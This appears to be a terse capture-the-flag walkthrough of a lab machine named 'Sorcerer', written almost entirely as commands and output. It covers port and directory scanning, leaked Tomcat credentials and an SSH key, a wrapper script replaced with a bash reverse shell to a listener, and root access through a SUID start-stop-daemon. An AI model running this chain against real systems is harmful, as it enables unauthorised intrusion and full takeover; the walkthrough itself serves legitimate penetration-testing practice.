$ sudo nmap -sCV -p- -v -Pn --open 192.168.115.100 > Sorcerer.txt
PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 81:2a:42:24:b5:90:a1:ce:9b:ac:e7:4e:1d:6d:b4:c6 (RSA)
|   256 d0:73:2a:05:52:7f:89:09:37:76:e3:56:c8:ab:20:99 (ECDSA)
|_  256 3a:2d:de:33:b0:1e:f2:35:0f:8d:c8:d7:8f:f9:e0:0e (ED25519)
80/tcp    open  http     nginx
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-title: Site doesn't have a title (text/html).
111/tcp   open  rpcbind  2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100003  3           2049/udp   nfs
|   100003  3,4         2049/tcp   nfs
|   100005  1,2,3      42329/tcp   mountd
|   100005  1,2,3      59704/udp   mountd
|   100021  1,3,4      33065/tcp   nlockmgr
|   100021  1,3,4      51595/udp   nlockmgr
|   100227  3           2049/tcp   nfs_acl
|_  100227  3           2049/udp   nfs_acl
2049/tcp  open  nfs      3-4 (RPC #100003)
7742/tcp  open  http     nginx
|_http-title: SORCERER
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
8080/tcp  open  http     Apache Tomcat 7.0.4
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/7.0.4
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
33065/tcp open  nlockmgr 1-4 (RPC #100021)
35835/tcp open  mountd   1-3 (RPC #100005)
42329/tcp open  mountd   1-3 (RPC #100005)
43307/tcp open  mountd   1-3 (RPC #100005)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


$ gobuster dir -u http://192.168.115.100:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 -x php,txt,conf -r
RELEASE-NOTES.txt
Apache Tomcat Version 9.0.38
http://sorcerer:8080/manager/html
<role rolename="manager-gui"/>
<user username="tomcat" password="s3cret" roles="manager-gui"/>

$ gobuster dir -u http://192.168.115.100:7742 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 -x php,txt,conf -r
zipfiles
francis.zip 
max.zip  
miriam.zip  
sofia.zip 
# Found these are users home directories. And user max has some interesting files.
tocat-users.xml.bak
<role rolename="manager-gui"/>
  <user username="tomcat" password="VTUD2XxJjf5LPmu6" roles="manager-gui"/>
</tomcat-users>
# also have .ssh folder with id_rsa

$ ssh -i id_rsa max@192.168.115.100
The authenticity of host '192.168.115.100 (192.168.115.100)' can't be established.
ED25519 key fingerprint is: SHA256:VS30806A83YR6y/jbQ1fv89VM1FjmXYbb9zmKkJ5N+4
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.115.100' (ED25519) to the list of known hosts.
PTY allocation request failed on channel 0
ACCESS DENIED.
usage: scp [-346BCpqrv] [-c cipher] [-F ssh_config] [-i identity_file]
           [-l limit] [-o ssh_option] [-P port] [-S program] source ... target
Connection to 192.168.115.100 closed.

# we found a scp_wrapper.sh which can explain this ACCESS DENIED
# only can user scp to upload and download files. The -O flag forces the scp command to use the legacy SCP/RCP protocol for file transfers instead of the modern SFTP protocol.
scp -O -i id_rsa max@192.168.115.100:path/to/file file
$ scp -O -i id_rsa test.txt max@192.168.115.100:/home/max/test.txt 

# Overwrite the wrapper
$ scp -O -i id_rsa scp_wrapper.sh max@192.168.115.100:/home/max/scp_wrapper.sh
#!/bin/bash
bash -i >& /dev/tcp/192.168.45.178/4444 0>&1

$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.45.178] from (UNKNOWN) [192.168.115.100] 35442
bash: cannot set terminal process group (945): Inappropriate ioctl for device
bash: no job control in this shell
max@sorcerer:~$ id
id
uid=1003(max) gid=1003(max) groups=1003(max)

LinEnum.sh
-rwsr-xr-x 1 root root 44200 Jun  3  2019 /usr/sbin/start-stop-daemon

max@sorcerer:/dev/shm$ /usr/sbin/start-stop-daemon -S -x /bin/sh -- -p
id
uid=1003(max) gid=1003(max) euid=0(root) groups=1003(max)

###########################################################################
Other interesting factor:
Linux version 4.19.0-10-amd64 (debian-kernel@lists.debian.org) (gcc version 8.3.0 (Debian 8.3.0-6)) #1 SMP Debian 4.19.132-1 (2020-07-24)
[CVE-2019-13272] PTRACE_TRACEME






